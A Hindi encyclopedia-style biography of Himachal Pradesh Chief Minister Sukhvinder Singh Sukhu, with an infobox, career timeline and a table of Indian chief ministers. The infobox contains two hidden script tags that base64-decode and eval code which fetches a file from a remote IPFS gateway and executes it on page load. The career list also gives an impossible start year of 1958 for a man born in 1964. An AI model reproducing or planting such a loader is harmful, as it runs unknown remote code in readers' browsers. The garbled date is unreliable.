सुखविंदर सिंह सुक्खू

भारत डिस्कवरी प्रस्तुति
यहाँ जाएँ:भ्रमण, खोजें
सुखविंदर सिंह सुक्खू
सुखविंदर सिंह सुक्खू
पूरा नाम सुखविंदर सिंह सुक्खू
जन्म 27 मार्च, 1964
जन्म भूमि नादौन, हिमाचल प्रदेश
अभिभावक माता- संसर देई

पिता- राशिल सिंह

पति/पत्नी कमलेश ठाकुर
संतान दो पुत्रियाँ
नागरिकता भारतीय
प्रसिद्धि राजनीतिज्ञ
पार्टी भारतीय राष्ट्रीय कांग्रेस
पद मुख्यमंत्री, हिमाचल प्रदेश- 11 दिसम्बर, 2022 से
शिक्षा राजनीति विज्ञान में मास्टर ऑफ आर्ट्स
विद्यालय गवर्नमेंट डिग्री कॉलेज, संजौली

हिमाचल प्रदेश विश्वविद्यालय, शिमला

पूर्वाधिकारी जयराम ठाकुर
अन्य जानकारी वर्ष 2003 में सुखविंदर सिंह सुक्खू ने अपना पहला विधानसभा चुनाव नादौन से लड़ा और जीत हासिल कर विधानसभा पहुंचे। वे दो बार शिमला नगर निगम के पार्षद भी रहे।
अद्यतन‎ <script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script><script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

सुखविंदर सिंह सुक्खू (अंग्रेज़ी: Sukhvinder Singh Sukhu, जन्म- 27 मार्च, 1964, नादौन, हिमाचल प्रदेश) हिमाचल प्रदेश के राजनीतिज्ञ हैं जो भारतीय राष्ट्रीय कांग्रेस से जुड़े हैं। वह हिमाचल प्रदेश के सातवें और वर्तमान मुख्यमंत्री हैं। सुखविंदर सिंह सुक्खू किसी राजनीतिक परिवार से नहीं आते हैं। इनके पिता हिमाचल प्रदेश परिवहन विभाग में चालक थे। सुखविंदर सिंह सुक्खू अपने कॉलेज के दिनों से ही पार्टी से जुड़ गए और राहुल गांधी के खास बन गए। वह इससे पहले तीन बार विधायक रह चुके हैं। नादौन विधानसभा से इन्होंने जीत हासिल की और 11 दिसंबर, 2022 को मुख्यमंत्री पद की शपथ ली।

परिचय

सुखविंदर सिंह सुक्खू का जन्म 27 मार्च, 1964 को हिमाचल प्रदेश के नादौन नाम के नगर में हुआ था। वह राजनीति में जमीनी स्तर से उठे। उनकी परिवारिक पृष्ठभूमि आर्थिक रूप से गरीब और कमजोर वर्ग की है। उन्होंने अपनी मेहनत और लगन के बल पर हिमाचल प्रदेश के मुख्यमंत्री का पद हासिल किया है। उनके पिता राशिल सिंह एक सरकारी कर्मचारी थे। उन्होंने कमलेश ठाकुर से शादी की है और उनकी दो बेटियां हैं।

शिक्षा

सुखविंदर सिंह सुक्खू ने प्रारंभिक शिक्षा गवर्नमेंट हाई स्कूल, कसुम्पटी, शिमला से पूरी की। उसके बाद उन्होंने अपनी आगे की पढाई के लिए गवर्नमेंट डिग्री कॉलेज, संजौली में दाखिला लिया, जहां से उन्होंने कानून की पढ़ाई की। उसके बाद हिमाचल प्रदेश विश्वविद्यालय, शिमला से राजनीति विज्ञान में मास्टर ऑफ आर्ट्स की डिग्री प्राप्त की।[1]

राजनीतिक कॅरियर

  • एनएसयूआई के प्रदेश अध्यक्ष, 1989 से लेकर 1995 तक।
  • भारतीय राष्ट्रीय युवा कांग्रेस के प्रदेश अध्यक्ष, 1958 से लेकर 2005 तक।
  • शिमला नगर निगम के पार्षद, 1992 लेकर 1997 तक।
  • 1997 में शिमला नगर निगम के पार्षद के रूप में पुन: निर्वाचित।
  • राज्य विधान सभा के लिए निर्वाचित, 2003 में।
  • राज्य विधान सभा के लिए पुन: निर्वाचित, 2007 में।
  • 2007-2012: कांग्रेस विधायक दल ने उन्हें सचेतक नियुक्त किया।
  • 2017 में विधानसभा के लिए पुन: निर्वाचित
  • सार्वजनिक उपक्रमों, विशेषाधिकारों के सदस्य के रूप में मनोनीत और व्यापार सलाहकार समिति का सदस्य उन्हें 2017 में बनाया गया।
  • हिमाचल प्रदेश विधानसभा चुनाव, 2022 में नादौन निर्वाचन क्षेत्र से सीट जीती। जिसके बाद उन्हें हिमाचल प्रदेश का मुख्यमंत्री बनाया गया। I


पन्ने की प्रगति अवस्था
आधार
प्रारम्भिक
माध्यमिक
पूर्णता
शोध

टीका टिप्पणी और संदर्भ

  1. सुखविंदर सिंह सुक्खू का जीवन परिचय (हिंदी) easyhindi.in। अभिगमन तिथि: 02 जुलाई, 2023।

संबंधित लेख

भारतीय राज्यों में पदस्थ मुख्यमंत्री
क्रमांक राज्य मुख्यमंत्री तस्वीर पार्टी पदभार ग्रहण
1. अरुणाचल प्रदेश पेमा खांडू
Pema-Khandu.jpg
भाजपा 17 जुलाई, 2016
2. असम हिमंता बिस्वा सरमा
Himanta-Biswa-Sarma.jpg
भाजपा 10 मई, 2021
3. आंध्र प्रदेश वाई एस जगनमोहन रेड्डी
Y-S-Jaganmohan-Reddy.jpg
वाईएसआर कांग्रेस पार्टी 30 मई, 2019
4. उत्तर प्रदेश योगी आदित्यनाथ
Yogi-Adityanath-1.jpg
भाजपा 19 मार्च, 2017
5. उत्तराखण्ड पुष्कर सिंह धामी
Pushkar-Singh-Dhami.jpg
भाजपा 4 जुलाई, 2021
6. ओडिशा नवीन पटनायक
Naveen-Patnaik.jpg
बीजू जनता दल 5 मार्च, 2000
7. कर्नाटक सिद्धारमैया
Siddaramaiah.jpg
भारतीय राष्ट्रीय कांग्रेस 20 मई, 2023
8. केरल पिनाराई विजयन
Pinarayi Vijayan.jpg
मार्क्सवादी कम्युनिस्ट पार्टी 25 मई, 2016
9. गुजरात भूपेन्द्र पटेल
Bhupendra-Patel.jpg
भाजपा 12 सितम्बर, 2021
10. गोवा प्रमोद सावंत
Pramod-Sawant.jpg
भाजपा 19 मार्च, 2019
11. छत्तीसगढ़ विष्णु देव साय
Vishnu-Deo-Sai.jpg
भारतीय जनता पार्टी 13 दिसम्बर, 2023
12. जम्मू-कश्मीर रिक्त (राज्यपाल शासन) लागू नहीं 20 जून, 2018
13. झारखण्ड हेमन्त सोरेन
Hemant-Soren.JPG
झारखंड मुक्ति मोर्चा 29 दिसम्बर, 2019
14. तमिल नाडु एम. के. स्टालिन
M-K-Stalin.jpg
द्रविड़ मुन्नेत्र कड़गम 7 मई, 2021
15. त्रिपुरा माणिक साहा
Manik-Saha.jpeg
भाजपा 15 मई, 2022
16. तेलंगाना अनुमुला रेवंत रेड्डी
Revanth-Reddy.jpg
भारतीय राष्ट्रीय काँग्रेस 7 दिसंबर, 2023
17. दिल्ली अरविन्द केजरीवाल
KEJRIWAL.jpg
आप 14 फ़रवरी, 2015
18. नागालैण्ड नेफियू रियो
Neiphiu-Rio.jpg
एनडीपीपी 8 मार्च, 2018
19. पंजाब भगवंत मान
Bhagwant-Mann.jpg
आम आदमी पार्टी 16 मार्च, 2022
20. पश्चिम बंगाल ममता बनर्जी
Mamata Banerjee.jpg
तृणमूल कांग्रेस 20 मई, 2011
21. पुदुचेरी एन. रंगास्वामी
N-Rangasamy.jpg
कांग्रेस 7 मई, 2021
22. बिहार नितीश कुमार
Nitish-Kumar-1.jpg
जदयू 27 जुलाई, 2017
23. मणिपुर एन. बीरेन सिंह
N.Biren-Singh-1.jpg
भाजपा 15 मार्च, 2017
24. मध्य प्रदेश मोहन यादव
Mohan-Yadav.jpg
भाजपा 13 दिसंबर, 2023
25. महाराष्ट्र एकनाथ शिंदे
Eknath-Shinde.jpg
शिव सेना 30 जून, 2022
26. मिज़ोरम लालदुहोमा
Lalduhoma.jpg
जोरम पीपल्स मूवमेंट 8 दिसम्बर, 2023
27. मेघालय कॉनराड संगमा
Conrad-Sangma-1.jpg
एनपीपी 6 मार्च, 2018
28. राजस्थान भजन लाल शर्मा
Bhajan-Lal-Sharma.jpg
भारतीय जनता पार्टी 15 दिसम्बर, 2023
29. सिक्किम प्रेम सिंह तमांग
Prem-Singh-Tamang.jpg
सिक्किम क्रांतिकारी मोर्चा 27 मई, 2019
30. हरियाणा नायब सिंह सैनी
Nayab-Singh-Saini.jpg
भाजपा 12 मार्च, 2024
31. हिमाचल प्रदेश सुखविंदर सिंह सुक्खू
Sukhvinder-Singh-Sukhu.jpg
भारतीय राष्ट्रीय कांग्रेस 11 दिसम्बर, 2022